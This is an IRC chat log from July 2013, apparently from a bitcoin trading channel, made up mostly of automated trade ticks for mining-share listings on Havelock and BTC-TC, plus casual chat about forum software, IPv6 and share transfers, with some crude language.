22:57:53 [HAVELOCK] [AM100] 1 @ 0.042949 BTC [+] Jul 10 22:58:05 [HAVELOCK] [AM100] 1 @ 0.042949 BTC [+] Jul 10 22:59:47 -mist- [Global Notice] We're still working on getting services (nickserv, chanserv, alis, etc.) back up and running. Another global notice will be sent once we're happy that they are back properly. Jul 10 23:01:11 [HAVELOCK] [AM100] 17 @ 0.042949 = 0.7301 BTC [+] Jul 10 23:01:17 [HAVELOCK] [AM100] 1 @ 0.042949 BTC [+] Jul 10 23:01:51 -mquin- [Global Notice] Services are now back but may be lagged for a little while as everyone identifies. Thank you for your patience and for flying freenode! Jul 10 23:02:53 [HAVELOCK] [AM100] 5 @ 0.0429 = 0.2145 BTC [-] Jul 10 23:03:17 [BTCTC] [B.YABMC] 1 @ 0.004605 BTC [-] Jul 10 23:04:33 [HAVELOCK] [AM100] 1 @ 0.042899 BTC [-] Jul 10 23:06:08 [HAVELOCK] [AM100] 1 @ 0.042889 BTC [-] Jul 10 23:07:40 [HAVELOCK] [AM100] 3 @ 0.04249998 = 0.1275 BTC [-] Jul 10 23:07:40 [HAVELOCK] [AM100] 3 @ 0.04249998 = 0.1275 BTC [-] Jul 10 23:09:32 [HAVELOCK] [AM100] 1 @ 0.04249998 BTC [-] Jul 10 23:13:30 [BTCTC] [LTC-ATF.B2] 1 @ 0.0105 BTC [+] Jul 10 23:15:19 [HAVELOCK] [AM100] 2 @ 0.04249998 = 0.085 BTC [-] Jul 10 23:18:28 http://www.theverge.com/2013/7/10/4511486/the-solar-system-has-a-tail-nasa-reveals Jul 10 23:18:32 The solar system has a tail, NASA reveals | The Verge Jul 10 23:18:33 http://i.imgur.com/pJR5zm6.gif Jul 10 23:18:34 [HAVELOCK] [AM100] 1 @ 0.04249 BTC [-] Jul 10 23:19:44 [BTCTC] [DMS.MINING] 63 @ 0.018579 = 1.1705 BTC [+] Jul 10 23:19:45 [BTCTC] [DMS.MINING] 21 @ 0.01858 = 0.3902 BTC [+] Jul 10 23:19:55 [BTCTC] [DMS.MINING] 66 @ 0.018584 = 1.2265 BTC [+] Jul 10 23:20:51 https://support.mtgox.com/entries/21692589-Changes-to-Deposit-Transfer-Procedures Jul 10 23:20:53 Changes to Deposit Transfer Procedures : Support Desk Jul 10 23:20:56 ThickAsThieves: stop posting that fucking gif Jul 10 23:21:26 that gif was made by some fucktard trying to pass off "spiral helix SPACE DNA" bullshit off as real science Jul 10 23:21:56 [BTCTC] [DMS.SELLING] 52 @ 0.031199 = 1.6223 BTC [-] Jul 10 23:21:59 [BTCTC] [DMS.SELLING] 98 @ 0.0312 = 3.0576 BTC [+] Jul 10 23:22:36 deal with it Jul 10 23:22:43 look i'm famous Jul 10 23:22:43 https://asicminer.info/friedcat-asicminer-official-update-july-09-2013/ Jul 10 23:22:55 ASICMINER Official Update for July 9th, 2013ASICMINER.info Jul 10 23:23:31 ThickAsThieves: you're famous? dude, I've been on the front page of slashdot three times, the front page of digg twice, the front page of reddit at least once, and all for the same article. Jul 10 23:23:38 [BTCTC] [B.YABMC] 3 @ 0.004605 = 0.0138 BTC [-] Jul 10 23:24:24 [MPEX] [S.MPOE] 5233 @ 0.00081085 = 4.2432 BTC [-] Jul 10 23:24:49 lol Jul 10 23:24:55 i wasn't serious man Jul 10 23:25:22 LOL Jul 10 23:25:25 [BTCTC] [TAT.ASICMINER] 12 @ 0.042001 = 0.504 BTC [-] Jul 10 23:25:34 i was on national tv. twice. Jul 10 23:25:40 [BTCTC] [B.YABMC] 1 @ 0.004605 BTC [-] Jul 10 23:25:44 national tv of somalia? Jul 10 23:25:47 i was in a rock n roll band Jul 10 23:26:25 [BTCTC] [LTC-ATF.B2] 8 @ 0.0105 = 0.084 BTC [+] Jul 10 23:26:36 [BTCTC] [BASIC-MINING] 2 @ 0.269993 = 0.54 BTC [+] Jul 10 23:27:06 actually i can beat you Diablo-D3 Jul 10 23:27:17 i've been quoted on trilema like 20 times Jul 10 23:27:20 booya Jul 10 23:27:30 [BTCTC] [TAT.ASICMINER] 1 @ 0.042001 BTC [-] Jul 10 23:27:42 [BTCTC] [DMS.MINING] 4 @ 0.0181 = 0.0724 BTC [-] Jul 10 23:27:43 [BTCTC] [DMS.MINING] 28 @ 0.0181 = 0.5068 BTC [-] Jul 10 23:27:57 [BTCTC] [AMC-PT] 50 @ 0.00249 = 0.1245 BTC [+] Jul 10 23:28:20 [BTCTC] [DMS.PURCHASE] 130 @ 0.048832 = 6.3482 BTC [-] Jul 10 23:28:55 ThickAsThieves: ... who? Jul 10 23:29:00 maybe in 100 years trilema becomes canonical historical source about bitcoin origins Jul 10 23:29:03 [BTCTC] [DMS.SELLING] 1 @ 0.0312 BTC [+] Jul 10 23:29:14 carefully abridged, ofc :D Jul 10 23:29:27 ThickAsThieves: and if we want to be bitcoin famous, I was one of the first 100 users and wrote the best miner in bithistory Jul 10 23:29:54 it's not in trilema, hence you don't exist Jul 10 23:30:07 still doesn't beat me asking mp retarded questions in blog posts Jul 10 23:30:16 MY EPEEN IS THAT BIG [-----------------------------------] Jul 10 23:30:22 this is on my 60" LCD Jul 10 23:30:41 [BTCTC] [DMS.MINING] 48 @ 0.018582 = 0.8919 BTC [+] Jul 10 23:31:19 Diablo-D3, what is your next feat of strength? Jul 10 23:31:59 [HAVELOCK] [AM100] 1 @ 0.0423 BTC [-] Jul 10 23:32:26 [BTCTC] [BTC-BOND] 12 @ 0.00999 = 0.1199 BTC [-] Jul 10 23:33:22 [BTCTC] [ASICMINER-PT] 2 @ 4.31 = 8.62 BTC [-] Jul 10 23:34:13 [BTCTC] [ASICMINER-PT] 2 @ 4.3 = 8.6 BTC [-] Jul 10 23:34:13 ThickAsThieves: well, Im trying to write forum software that doesnt make me want to murder php developers in their sleep. well, not as much, anyways. Jul 10 23:34:24 [BTCTC] [ASICMINER-PT] 1 @ 4.3 BTC [-] Jul 10 23:34:35 all forum software sucks ass Jul 10 23:34:42 forums should be realtime like irc Jul 10 23:34:58 [HAVELOCK] [AM100] 2 @ 0.0423 = 0.0846 BTC [-] Jul 10 23:35:35 and php is the worst platform for that kind of stuff lol Jul 10 23:35:38 Scrat: what about Discourse? http://try.discourse.org/ Jul 10 23:35:56 ericmuyser: yeah I know, I think it's too radical Jul 10 23:36:28 Scrat: well, reddit oddly enough works great as a forum Jul 10 23:36:34 [HAVELOCK] [HIM] 1 @ 0.290001 BTC [-] Jul 10 23:36:39 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.0047 BTC [+] Jul 10 23:36:45 it just doesnt work well as a reddit. Jul 10 23:36:58 (mind boggling isnt it) Jul 10 23:37:22 (and reddit is basically a combination of the usenet thought process and forums anyhow) Jul 10 23:37:23 i don't like looking at reddit Jul 10 23:37:34 it's all retarded Jul 10 23:37:41 like, I wont allow quoting in mine Jul 10 23:38:06 [BTCTC] [DMS.PURCHASE] 57 @ 0.048832 = 2.7834 BTC [-] Jul 10 23:38:07 could be confusing and/or problematic? Jul 10 23:38:24 quoting in forums is epic time wasting evil Jul 10 23:38:36 just have a fucking reply tree Jul 10 23:38:48 quoting especially in that piece of shit SMF 1.0 Jul 10 23:38:53 makes you want to kill yourself Jul 10 23:39:15 if you need to break up answers it's a lot clearer. it's also used to hold an OP accountable for what he originally wrote, unless you don't allow editing either Jul 10 23:39:29 [HAVELOCK] [AM100] 1 @ 0.0424 BTC [+] Jul 10 23:40:13 [HAVELOCK] [AM100] 4 @ 0.0424 = 0.1696 BTC [+] Jul 10 23:42:13 [HAVELOCK] [AM100] 37 @ 0.0424 = 1.5688 BTC [+] Jul 10 23:42:14 [HAVELOCK] [AM100] 1 @ 0.0422 BTC [-] Jul 10 23:42:15 [HAVELOCK] [AM100] 31 @ 0.042105 = 1.3053 BTC [-] Jul 10 23:42:16 [HAVELOCK] [AM100] 60 @ 0.0421 = 2.526 BTC [-] Jul 10 23:42:17 [HAVELOCK] [AM100] 4 @ 0.0421 = 0.1684 BTC [-] Jul 10 23:42:18 [HAVELOCK] [AM100] 67 @ 0.04200502 = 2.8143 BTC [-] Jul 10 23:42:40 [HAVELOCK] [AM100] 18 @ 0.04200502 = 0.7561 BTC [-] Jul 10 23:42:41 [HAVELOCK] [AM100] 1 @ 0.04200401 BTC [-] Jul 10 23:42:42 [HAVELOCK] [AM100] 4 @ 0.042 = 0.168 BTC [-] Jul 10 23:42:42 [HAVELOCK] [AM100] 30 @ 0.042 = 1.26 BTC [-] Jul 10 23:42:43 [HAVELOCK] [AM100] 2 @ 0.041704 = 0.0834 BTC [-] Jul 10 23:43:33 kakobreklaa: assbot not working anymore in -trades? Jul 10 23:43:52 freenode services down = no op = silent Jul 10 23:44:03 ah, ic Jul 10 23:44:42 [BTCTC] [DMS.SELLING] 50 @ 0.031199 = 1.56 BTC [-] Jul 10 23:44:43 [BTCTC] [DMS.SELLING] 1 @ 0.0312 BTC [+] Jul 10 23:44:44 [BTCTC] [DMS.SELLING] 118 @ 0.0312 = 3.6816 BTC [+] Jul 10 23:44:45 [BTCTC] [DMS.SELLING] 35 @ 0.0313 = 1.0955 BTC [+] Jul 10 23:44:47 [BTCTC] [DMS.SELLING] 23 @ 0.03138 = 0.7217 BTC [+] Jul 10 23:44:48 [BTCTC] [DMS.SELLING] 40 @ 0.031899 = 1.276 BTC [+] Jul 10 23:44:49 [BTCTC] [DMS.SELLING] 100 @ 0.0319 = 3.19 BTC [+] Jul 10 23:44:50 [BTCTC] [DMS.SELLING] 33 @ 0.032 = 1.056 BTC [+] Jul 10 23:45:48 [BTCTC] [DMS.SELLING] 15 @ 0.032 = 0.48 BTC [+] Jul 10 23:52:48 [BTCTC] [ASICMINER-PT] 1 @ 4.3001 BTC [+] Jul 10 23:52:49 [BTCTC] [ASICMINER-PT] 99 @ 4.3 = 425.7 BTC [-] Jul 10 23:53:34 [BTCTC] [DMS.MINING] 50 @ 0.0181 = 0.905 BTC [-] Jul 10 23:53:36 [BTCTC] [DMS.MINING] 120 @ 0.018005 = 2.1606 BTC [-] Jul 10 23:53:52 [HAVELOCK] [AM1] 1 @ 4.5 BTC Jul 10 23:54:53 [BTCTC] [DMS.PURCHASE] 32 @ 0.048832 = 1.5626 BTC [-] Jul 10 23:54:58 [BTCTC] [DMS.PURCHASE] 200 @ 0.048832 = 9.7664 BTC [-] Jul 10 23:55:42 [BTCTC] [DMS.MINING] 108 @ 0.018004 = 1.9444 BTC [-] Jul 10 23:55:42 [BTCTC] [DMS.MINING] 2 @ 0.018 = 0.036 BTC [-] Jul 10 23:56:12 [BTCTC] [DMS.PURCHASE] 130 @ 0.048832 = 6.3482 BTC [-] Jul 10 23:57:10 [BTCTC] [BASIC-MINING] 8 @ 0.269993 = 2.1599 BTC [+] Jul 10 23:57:12 [BTCTC] [BASIC-MINING] 17 @ 0.269994 = 4.5899 BTC [+] Jul 10 23:57:13 [BTCTC] [BASIC-MINING] 3 @ 0.27 = 0.81 BTC [+] Jul 10 23:57:14 [BTCTC] [BASIC-MINING] 5 @ 0.275 = 1.375 BTC [+] Jul 10 23:57:15 [BTCTC] [BASIC-MINING] 10 @ 0.279 = 2.79 BTC [+] Jul 10 23:57:16 [BTCTC] [BASIC-MINING] 8 @ 0.279998 = 2.24 BTC [+] Jul 10 23:57:17 [BTCTC] [BASIC-MINING] 2 @ 0.28 = 0.56 BTC [+] Jul 10 23:57:17 [BTCTC] [BASIC-MINING] 5 @ 0.28 = 1.4 BTC [+] Jul 10 23:59:07 [HAVELOCK] [AM100] 32 @ 0.041701 = 1.3344 BTC [-] Jul 11 00:01:05 -mquin- [Global Notice] That should be the last bump, services are back now and should be working normally. Thank you all again for your patience and understanding. Jul 11 00:04:44 [BTCTC] [TAT.ASICMINER] 13 @ 0.042799 = 0.5564 BTC [+] Jul 11 00:05:32 [BTCTC] [TAT.ASICMINER] 2 @ 0.0428 = 0.0856 BTC [+] Jul 11 00:05:46 [BTCTC] [TAT.ASICMINER] 2 @ 0.0428 = 0.0856 BTC [+] Jul 11 00:06:01 Damn it's raining hard Jul 11 00:06:31 no it isn't Jul 11 00:06:42 O yes it is Jul 11 00:06:43 [BTCTC] [DMS.PURCHASE] 55 @ 0.048832 = 2.6858 BTC [-] Jul 11 00:07:28 [HAVELOCK] [AM100] 2 @ 0.04199 = 0.084 BTC [+] Jul 11 00:09:05 rulother: no it isnt Jul 11 00:09:12 its cloudy but not raining Jul 11 00:09:35 [BTCTC] [PAJKA.BOND] 3 @ 0.055 = 0.165 BTC [-] Jul 11 00:10:04 [HAVELOCK] [AM1] 1 @ 4.5 BTC Jul 11 00:10:31 jesus, damn forums. 1 search per 10 seconds... what lame way to deal with overcrowding and ddos. "The last posting from your IP was less than 10 seconds ago. Please try again later." Jul 11 00:10:59 [BTCTC] [BFMINES] 73 @ 0.004 = 0.292 BTC [+] Jul 11 00:11:12 yeah Jul 11 00:11:16 Im not going to allow that anyhow Jul 11 00:11:26 its clear too many ISPs are fucking homo dick sucking fudge rammers Jul 11 00:11:27 [BTCTC] [TAT.ASICMINER] 11 @ 0.042011 = 0.4621 BTC [-] Jul 11 00:11:33 and NAT behind an IPv4 pool Jul 11 00:11:41 wat Jul 11 00:11:46 because they're too busy sucking entire bags of dicks to setup ipv6 Jul 11 00:11:52 lol Jul 11 00:11:53 [BTCTC] [BASIC-MINING] 2 @ 0.288998 = 0.578 BTC [+] Jul 11 00:12:12 theres no business case for v6 Jul 11 00:12:34 nobody wants it Jul 11 00:12:53 you mean except for the fact we've ran out of ipv4 ips Jul 11 00:12:59 no we havent Jul 11 00:13:08 IANA has Jul 11 00:13:10 well, I mean outside from the 21 /8s the DOD has Jul 11 00:13:12 the internet is fine Jul 11 00:13:27 [BTCTC] [BASIC-MINING] 4 @ 0.288998 = 1.156 BTC [+] Jul 11 00:13:50 and the 2 HP has and the 1 IBM has (although I imagine both of them are now using it for their cloud services) Jul 11 00:14:07 [BTCTC] [BASIC-MINING] 15 @ 0.288999 = 4.335 BTC [+] Jul 11 00:14:08 [BTCTC] [BASIC-MINING] 24 @ 0.289 = 6.936 BTC [+] Jul 11 00:14:10 [BTCTC] [BASIC-MINING] 13 @ 0.29 = 3.77 BTC [+] Jul 11 00:14:11 and what this has to do with theymos being brain damaged escapes me Jul 11 00:14:19 dub: nothing? Jul 11 00:14:26 why did you bring up theymos? Jul 11 00:14:26 [BTCTC] [TAT.ASICMINER] 6 @ 0.0428 = 0.2568 BTC [+] Jul 11 00:14:29 [HAVELOCK] [AM100] 1 @ 0.04195 BTC [-] Jul 11 00:14:42 yes, seeing public space on IBMs corp lan was lulzy Jul 11 00:15:42 Im just writing forum software to make forums better Jul 11 00:16:02 if theymos has the balls to use the software that was written by someone he pissed off, thats up to him Jul 11 00:16:56 shit, thats almost like having a job Jul 11 00:16:58 [BTCTC] [DMS.MINING] 2 @ 0.018398 = 0.0368 BTC [+] Jul 11 00:17:07 Diabloz all growed up Jul 11 00:18:03 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.0047 BTC [+] Jul 11 00:18:06 [BTCTC] [TAT.ASICMINER] 2 @ 0.042799 = 0.0856 BTC [-] Jul 11 00:18:38 [HAVELOCK] [AM100] 1 @ 0.0417 BTC [-] Jul 11 00:20:04 [HAVELOCK] [AM100] 1 @ 0.040901 BTC [-] Jul 11 00:20:40 [HAVELOCK] [AM100] 1 @ 0.040901 BTC [-] Jul 11 00:20:55 [HAVELOCK] [AM100] 1 @ 0.040901 BTC [-] Jul 11 00:21:04 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.0047 BTC [+] Jul 11 00:21:19 [HAVELOCK] [AM100] 10 @ 0.040901 = 0.409 BTC [-] Jul 11 00:21:21 [HAVELOCK] [AM100] 3 @ 0.040901 = 0.1227 BTC [-] Jul 11 00:21:21 [HAVELOCK] [AM100] 1 @ 0.040901 BTC [-] Jul 11 00:21:23 [HAVELOCK] [AM100] 82 @ 0.040901 = 3.3539 BTC [-] Jul 11 00:21:46 [HAVELOCK] [AM1] 1 @ 4.55 BTC [+] Jul 11 00:22:09 [HAVELOCK] [VTX] 6 @ 0.949999 = 5.7 BTC [+] Jul 11 00:22:16 [BTCTC] [ASICMINER-PT] 1 @ 4.389 BTC [+] Jul 11 00:22:23 [HAVELOCK] [VTX] 7 @ 0.95 = 6.65 BTC [+] Jul 11 00:22:33 [HAVELOCK] [AM100] 496 @ 0.040901 = 20.2869 BTC [-] Jul 11 00:23:18 [HAVELOCK] [AM1] 4 @ 4.55 = 18.2 BTC [+] Jul 11 00:23:53 [HAVELOCK] [AM100] 404 @ 0.040901 = 16.524 BTC [-] Jul 11 00:24:01 [BTCTC] [ASICMINER-PT] 1 @ 4.39 BTC [+] Jul 11 00:24:05 [HAVELOCK] [AM100] 44 @ 0.04195 = 1.8458 BTC [+] Jul 11 00:24:24 [HAVELOCK] [AM100] 439 @ 0.041989 = 18.4332 BTC [+] Jul 11 00:24:34 [BTCTC] [BASIC-MINING] 10 @ 0.29 = 2.9 BTC [+] Jul 11 00:24:40 [HAVELOCK] [AM100] 48 @ 0.04199 = 2.0155 BTC [+] Jul 11 00:24:54 [HAVELOCK] [AM100] 1 @ 0.0409 BTC [-] Jul 11 00:25:15 [HAVELOCK] [AM100] 60 @ 0.0409 = 2.454 BTC [-] Jul 11 00:25:22 [HAVELOCK] [AM1] 4 @ 4.6 = 18.4 BTC [+] Jul 11 00:25:36 [HAVELOCK] [AM100] 500 @ 0.0409 = 20.45 BTC [-] Jul 11 00:26:34 [BTCTC] [ASICMINER-PT] 1 @ 4.39 BTC [+] Jul 11 00:26:36 [BTCTC] [ASICMINER-PT] 1 @ 4.39999 BTC [+] Jul 11 00:26:38 [BTCTC] [ASICMINER-PT] 2 @ 4.40999 = 8.82 BTC [+] Jul 11 00:26:54 [HAVELOCK] [AM1] 1 @ 4.6 BTC [+] Jul 11 00:27:00 [BTCTC] [S.MPOE-PT] 1 @ 0.000986 BTC [+] Jul 11 00:27:01 [BTCTC] [ASICMINER-PT] 1 @ 4.389 BTC [-] Jul 11 00:27:03 [BTCTC] [ASICMINER-PT] 1 @ 4.42 BTC [+] Jul 11 00:27:13 [HAVELOCK] [AM1] 3 @ 4.7 = 14.1 BTC [+] Jul 11 00:27:46 [HAVELOCK] [AM100] 190 @ 0.04070002 = 7.733 BTC [-] Jul 11 00:27:55 [HAVELOCK] [AM100] 244 @ 0.04070001 = 9.9308 BTC [-] Jul 11 00:28:20 [HAVELOCK] [AM1] 2 @ 4.7 = 9.4 BTC [+] Jul 11 00:28:32 [HAVELOCK] [AM1] 2 @ 4.8 = 9.6 BTC [+] Jul 11 00:29:03 [HAVELOCK] [AM100] 1 @ 0.0407 BTC [-] Jul 11 00:29:08 [HAVELOCK] [AM100] 10 @ 0.0407 = 0.407 BTC [-] Jul 11 00:29:16 [HAVELOCK] [AM100] 2 @ 0.0406 = 0.0812 BTC [-] Jul 11 00:29:19 [HAVELOCK] [AM100] 5 @ 0.0402 = 0.201 BTC [-] Jul 11 00:29:25 [HAVELOCK] [AM100] 2 @ 0.0401 = 0.0802 BTC [-] Jul 11 00:29:27 [HAVELOCK] [AM100] 1 @ 0.0409 BTC [+] Jul 11 00:29:29 [HAVELOCK] [AM100] 100 @ 0.04004 = 4.004 BTC [-] Jul 11 00:29:37 [HAVELOCK] [AM100] 143 @ 0.04001514 = 5.7222 BTC [-] Jul 11 00:29:47 [HAVELOCK] [AM100] 200 @ 0.0409 = 8.18 BTC [+] Jul 11 00:29:49 [HAVELOCK] [AM100] 50 @ 0.04001513 = 2.0008 BTC [-] Jul 11 00:29:57 [HAVELOCK] [AM100] 15 @ 0.0409 = 0.6135 BTC [+] Jul 11 00:30:02 [HAVELOCK] [AM100] 100 @ 0.0409 = 4.09 BTC [+] Jul 11 00:30:11 [HAVELOCK] [AM100] 20 @ 0.0409 = 0.818 BTC [+] Jul 11 00:30:17 [HAVELOCK] [AM100] 15 @ 0.0409 = 0.6135 BTC [+] Jul 11 00:30:21 [HAVELOCK] [AM1] 3 @ 4.8 = 14.4 BTC [+] Jul 11 00:30:24 [HAVELOCK] [AM100] 88 @ 0.0409 = 3.5992 BTC [+] Jul 11 00:30:26 [BTCTC] [AMC-PT] 259 @ 0.00249 = 0.6449 BTC [+] Jul 11 00:30:28 [HAVELOCK] [AM1] 3 @ 4.9 = 14.7 BTC [+] Jul 11 00:30:56 [BTCTC] [TAT.ASICMINER] 25 @ 0.0425 = 1.0625 BTC [-] Jul 11 00:31:14 [HAVELOCK] [AM100] 82 @ 0.0409 = 3.3538 BTC [+] Jul 11 00:31:33 [HAVELOCK] [AM100] 3 @ 0.04 = 0.12 BTC [-] Jul 11 00:31:39 [HAVELOCK] [AM100] 8 @ 0.04 = 0.32 BTC [-] Jul 11 00:31:44 [HAVELOCK] [AM100] 1 @ 0.04 BTC [-] Jul 11 00:31:49 [HAVELOCK] [AM100] 1 @ 0.04 BTC [-] Jul 11 00:31:54 [HAVELOCK] [AM100] 4 @ 0.04 = 0.16 BTC [-] Jul 11 00:32:00 [HAVELOCK] [AM100] 126 @ 0.04 = 5.04 BTC [-] Jul 11 00:32:06 [HAVELOCK] [AM100] 28 @ 0.04 = 1.12 BTC [-] Jul 11 00:32:07 [BTCTC] [TAT.ASICMINER] 1 @ 0.0425 BTC [-] Jul 11 00:32:25 [HAVELOCK] [AM1] 2 @ 4.9 = 9.8 BTC [+] Jul 11 00:33:23 [HAVELOCK] [AM100] 55 @ 0.040001 = 2.2001 BTC [+] Jul 11 00:35:22 [BTCTC] [RSM] 2 @ 0.015242 = 0.0305 BTC [+] Jul 11 00:35:24 [BTCTC] [RSM] 1 @ 0.015244 BTC [+] Jul 11 00:35:25 [BTCTC] [RSM] 1 @ 0.015919 BTC [+] Jul 11 00:36:16 [BTCTC] [TAT.ASICMINER] 60 @ 0.0428 = 2.568 BTC [+] Jul 11 00:36:29 [BTCTC] [TAT.ASICMINER] 6 @ 0.04288 = 0.2573 BTC [+] Jul 11 00:36:31 [BTCTC] [TAT.ASICMINER] 134 @ 0.04289 = 5.7473 BTC [+] Jul 11 00:37:28 [BTCTC] [TAT.ASICMINER] 15 @ 0.04289 = 0.6434 BTC [+] Jul 11 00:37:29 [BTCTC] [ASICMINER-PT] 1 @ 4.439 BTC [+] Jul 11 00:37:31 [BTCTC] [ASICMINER-PT] 1 @ 4.44 BTC [+] Jul 11 00:40:32 [BTCTC] [DMS.MINING] 87 @ 0.018396 = 1.6005 BTC [-] Jul 11 00:40:34 [BTCTC] [DMS.MINING] 2 @ 0.018397 = 0.0368 BTC [+] Jul 11 00:40:34 [BTCTC] [DMS.MINING] 37 @ 0.018397 = 0.6807 BTC [+] Jul 11 00:42:26 [BTCTC] [RSM] 10 @ 0.013104 = 0.131 BTC [-] Jul 11 00:42:44 [BTCTC] [B.YABMC] 8 @ 0.004605 = 0.0368 BTC [-] Jul 11 00:44:42 [BTCTC] [DMS.MINING] 16 @ 0.018397 = 0.2944 BTC [+] Jul 11 00:45:19 [BTCTC] [TAT.ASICMINER] 28 @ 0.04289 = 1.2009 BTC [+] Jul 11 00:45:54 [BTCTC] [TAT.ASICMINER] 2 @ 0.043 = 0.086 BTC [+] Jul 11 00:46:16 [HAVELOCK] [AM100] 60 @ 0.04022 = 2.4132 BTC [+] Jul 11 00:46:22 [HAVELOCK] [AM100] 1 @ 0.04022 BTC [+] Jul 11 00:46:38 [HAVELOCK] [AM100] 1 @ 0.042047 BTC [+] Jul 11 00:47:38 [HAVELOCK] [AM100] 1 @ 0.040231 BTC [-] Jul 11 00:48:30 [HAVELOCK] [AM100] 3 @ 0.040231 = 0.1207 BTC [-] Jul 11 00:48:33 [HAVELOCK] [AM100] 3 @ 0.040231 = 0.1207 BTC [-] Jul 11 00:48:36 [HAVELOCK] [AM100] 1 @ 0.040231 BTC [-] Jul 11 00:49:06 [HAVELOCK] [AM100] 2 @ 0.040231 = 0.0805 BTC [-] Jul 11 00:51:46 [HAVELOCK] [AM100] 3 @ 0.0401 = 0.1203 BTC [-] Jul 11 00:51:51 [HAVELOCK] [AM100] 7 @ 0.04004201 = 0.2803 BTC [-] Jul 11 00:51:57 [HAVELOCK] [AM100] 125 @ 0.040042 = 5.0053 BTC [-] Jul 11 00:52:04 [HAVELOCK] [AM100] 10 @ 0.04001 = 0.4001 BTC [-] Jul 11 00:52:10 [HAVELOCK] [AM100] 10 @ 0.040001 = 0.4 BTC [-] Jul 11 00:52:18 [HAVELOCK] [AM100] 59 @ 0.0399 = 2.3541 BTC [-] Jul 11 00:52:32 [HAVELOCK] [AM100] 118 @ 0.0398888 = 4.7069 BTC [-] Jul 11 00:52:40 [HAVELOCK] [AM100] 13 @ 0.039852 = 0.5181 BTC [-] Jul 11 00:52:46 [HAVELOCK] [AM100] 58 @ 0.03985 = 2.3113 BTC [-] Jul 11 00:53:12 [HAVELOCK] [AM1] 3 @ 4.88 = 14.64 BTC [-] Jul 11 00:53:34 [HAVELOCK] [AM100] 63 @ 0.03985 = 2.5106 BTC [-] Jul 11 00:53:41 [HAVELOCK] [AM100] 4 @ 0.039498 = 0.158 BTC [-] Jul 11 00:53:45 [BTCTC] [AMC-PT] 12 @ 0.0025 = 0.03 BTC [+] Jul 11 00:53:47 [HAVELOCK] [AM100] 151 @ 0.039 = 5.889 BTC [-] Jul 11 00:53:57 [HAVELOCK] [AM100] 20 @ 0.03815 = 0.763 BTC [-] Jul 11 00:53:59 [BTCTC] [AMC-PT] 200 @ 0.0025 = 0.5 BTC [+] Jul 11 00:54:05 [HAVELOCK] [AM100] 12 @ 0.03815 = 0.4578 BTC [-] Jul 11 00:54:07 [HAVELOCK] [AM100] 40 @ 0.03815 = 1.526 BTC [-] Jul 11 00:54:15 [HAVELOCK] [AM1] 2 @ 4.88 = 9.76 BTC [-] Jul 11 00:54:47 [HAVELOCK] [AM1] 1 @ 4.9 BTC [+] Jul 11 00:55:07 [HAVELOCK] [AM100] 1 @ 0.041 BTC [+] Jul 11 00:55:34 [HAVELOCK] [AM100] 13 @ 0.041 = 0.533 BTC [+] Jul 11 00:56:20 [BTCTC] [TAT.ASICMINER] 1 @ 0.043699 BTC [+] Jul 11 00:56:44 [BTCTC] [ASICMINER-PT] 1 @ 4.439 BTC [-] Jul 11 00:56:46 [BTCTC] [ASICMINER-PT] 1 @ 4.44 BTC [+] Jul 11 00:56:54 [HAVELOCK] [AM100] 1 @ 0.0396 BTC [-] Jul 11 00:58:09 [BTCTC] [ASICMINER-PT] 4 @ 4.44609 = 17.7844 BTC [+] Jul 11 00:58:41 [BTCTC] [ASICMINER-PT] 1 @ 4.44609 BTC [+] Jul 11 00:59:52 [HAVELOCK] [AM100] 250 @ 0.0395 = 9.875 BTC [-] Jul 11 01:00:12 [HAVELOCK] [AM1] 2 @ 4.88 = 9.76 BTC [-] Jul 11 01:01:26 [HAVELOCK] [AM100] 22 @ 0.0396 = 0.8712 BTC [+] Jul 11 01:01:49 [HAVELOCK] [AM100] 4 @ 0.038 = 0.152 BTC [-] Jul 11 01:01:51 [HAVELOCK] [AM100] 15 @ 0.03751 = 0.5627 BTC [-] Jul 11 01:01:51 [HAVELOCK] [AM100] 25 @ 0.0371 = 0.9275 BTC [-] Jul 11 01:01:52 [HAVELOCK] [AM100] 10 @ 0.037 = 0.37 BTC [-] Jul 11 01:01:54 [HAVELOCK] [AM100] 27 @ 0.037 = 0.999 BTC [-] Jul 11 01:01:55 [HAVELOCK] [AM100] 518 @ 0.039798 = 20.6154 BTC [+] Jul 11 01:02:05 [HAVELOCK] [AM100] 120 @ 0.039798 = 4.7758 BTC [+] Jul 11 01:02:49 [BTCTC] [TAT.ASICMINER] 3 @ 0.0435 = 0.1305 BTC [-] Jul 11 01:03:00 [HAVELOCK] [AM100] 1 @ 0.0396 BTC [-] Jul 11 01:03:41 [HAVELOCK] [AM100] 3 @ 0.0396 = 0.1188 BTC [-] Jul 11 01:03:49 [HAVELOCK] [AM100] 9 @ 0.0396 = 0.3564 BTC [-] Jul 11 01:04:25 [HAVELOCK] [AM100] 30 @ 0.0396 = 1.188 BTC [-] Jul 11 01:04:25 AM leaking? :o Jul 11 01:04:35 [BTCTC] [TAT.ASICMINER] 3 @ 0.0428 = 0.1284 BTC [-] Jul 11 01:05:03 people wanting to trade up to whole shares it looks like Jul 11 01:05:16 derpderpderp Jul 11 01:05:28 [HAVELOCK] [AM100] 10 @ 0.039499 = 0.395 BTC [-] Jul 11 01:05:50 kinda dumb yes Jul 11 01:06:14 they are taking a 10% value cut to pay another 10% premium Jul 11 01:06:31 when they could just keep what they have Jul 11 01:06:49 [BTCTC] [TAT.VIRTUALMINE] 3 @ 0.0047 = 0.0141 BTC [+] Jul 11 01:07:36 so havelock has an api transfer widget? Jul 11 01:07:44 where can you xfer to? Jul 11 01:07:59 i can push shares to users within havelock Jul 11 01:08:06 otherwise i'm doing stuff manually Jul 11 01:08:21 havelock will also be adding an export request form Jul 11 01:08:22 ah Jul 11 01:08:43 thgouth it might be automagic like the mpex stuff Jul 11 01:09:04 [HAVELOCK] [AM100] 2 @ 0.039499 = 0.079 BTC [-] Jul 11 01:09:15 but you'd clearly need another end Jul 11 01:09:19 yeah Jul 11 01:09:30 and i doubt they'll wanna cooperate Jul 11 01:11:16 [HAVELOCK] [AM100] 1 @ 0.039499 BTC [-] Jul 11 01:13:42 [BTCTC] [DMS.SELLING] 50 @ 0.0315 = 1.575 BTC [-] Jul 11 01:13:44 [BTCTC] [DMS.SELLING] 9 @ 0.031997 = 0.288 BTC [+] Jul 11 01:13:46 [BTCTC] [DMS.SELLING] 1 @ 0.031998 BTC [+] Jul 11 01:15:27 [BTCTC] [TAT.ASICMINER] 3 @ 0.043499 = 0.1305 BTC [+] Jul 11 01:15:38 [HAVELOCK] [AM100] 1 @ 0.03949 